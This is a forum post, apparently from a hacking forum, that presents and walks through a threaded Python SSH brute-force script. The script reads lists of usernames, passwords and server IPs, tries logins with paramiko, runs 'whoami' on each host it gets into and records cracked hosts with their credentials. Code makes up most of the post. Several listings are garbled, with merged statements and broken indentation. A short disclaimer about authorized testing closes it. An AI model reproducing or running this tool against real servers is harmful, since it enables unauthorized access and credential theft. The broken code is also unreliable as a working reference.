Python Script for SSH Brute Force Attack With Threads, Analysis and Explanation

D2

D2

Администратор
Регистрация
19 Фев 2025
Сообщения
4,380
Реакции
0
XSS.is(Python Script).png



Hi Guys, im LC . today we are here to discuss and learn about a script that can perform SSH brute force attack with threads and so more...

Introduction:

In the world of cybersecurity, one common method for unauthorized access to systems is using brute force attacks. These attacks involve trying all possible combinations of usernames and passwords to find the correct ones. In this article, we will analyze a Python code that attempts to access SSH servers using brute force attacks. This code uses libraries like paramiko for managing SSH connections, threading for multi-threading, and colorama for coloring terminal outputs.

Importing Libraries and Initial Setup:

First, the necessary libraries are imported and initial settings are configured

Python: Скопировать в буфер обмена
Код: 
import paramiko
from threading import Thread
import os
import colorama
colorama.init(autoreset=True)

- paramiko: For managing SSH connections. This library allows you to connect to SSH servers and execute commands remotely.
- Thread: For creating and managing threads. This allows us to perform multiple operations simultaneously.
- os: For executing system commands. used in this script for getting the ping of the sever, it can be handy for various operating system tasks.
- colorama: For coloring terminal outputs. "colorama.init(autoreset=True)" initializes auto-reset of colors after each output, so we don't have to reset the colors manually.

Reading Usernames, Passwords, and Server IPs:

In this section, text files containing usernames, passwords, and server IPs are opened and their contents read

Python: Скопировать в буфер обмена
Код: 
usernamefile = open("username.txt")
passfile = open("password.txt")
ips = open("servers.txt")
usernames = usernamefile.readlines()
usernames = [username.strip() for username in usernames]
passwords = passfile.readlines()
passwords = [password.strip() for password in passwords]
servers = ips.readlines()
servers = [server.strip() for server in servers]

- Files are opened, and each line from the files is read and stored in respective lists.
- Extra characters like newline are stripped from the end of each line.
- usernames: A list of usernames.
- passwords: A list of passwords.
- servers: A list of servers IP addresses.

SSH Connection Function:

A function to attempt to connect to servers using username and password
Python: Скопировать в буфер обмена
Код: 
def connent(host, username, password):
    try: client = paramiko.client.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(host, username=username, password=password, timeout=10)
        _stdin, _stdout, _stderr = client.exec_command("whoami")
        print(_stdout.read().decode())
        print(colorama.Fore.BLUE + f"server {host} cracked with the username {username} and password {password}!")
        alive_server_cracked = open("alive_servers_cracked.txt", "a") alive_server_cracked.write(str(host) + "\t" + str(username) + "\t" + str(password) + "\t" + "\n")
        alive_server_cracked.write(str(_stdout.read().decode()) + "\n")
        client.close()
    except paramiko.ssh_exception.SSHException or ConnectionResetError:
        print(f"there was something wrong with {host} {username} {password}")



- Attempts to connect to the SSH server using the username and password.
- Executes the whoami command to verify the connection. This command returns the username of the user logged into the system.
- Logs successes in the alive_servers_cracked.txt file.
- Handles SSH exceptions and connection errors. This ensures that the program continues to run smoothly in case of errors.

Thread Management and Executing Brute Force Attack:

In this section, threads are created and managed to perform brute force attempts in parallel:
Python: Скопировать в буфер обмена
Код: 
threads = []
counter = 0
for j in range(len(servers)):
    server_file = open("alive_servers.txt", "a") server_file.write(str(servers[j]) + "\n")
     for i in range(len(usernames)):
          for x in range(len(passwords)):
               thread = Thread(target=connent, args=(servers[j], usernames, passwords[x]))
               print(thread) threads.append(thread)
               print(f"sending request to {servers[j]} {usernames} {passwords[x]}") thread.start()
    counter += 1
     if counter == 5:
          for z in threads:
               z.join()
       threads.clear() counter = 0


- For each server, for each combination of username and password, a thread is created and started.
- The IP of each server is logged in the alive_servers.txt file.
- Threads are managed and executed in batches of 5 to control the number of concurrent threads. This ensures that the system is not overloaded and resources are managed efficiently.

Summery:

This Python script is designed as a tool for performing SSH brute force attacks.
By utilizing multi-threading, it attempts multiple connections to servers and logs successful attempts.
Such tools can be useful for security testing and identifying vulnerabilities in systems, but unauthorized use of them can have legal consequences.
Therefore, always use such tools with permission and within the legal framework.
Enjoy
 
Войдите или зарегистрируйтесь для ответа.
Сверху Снизу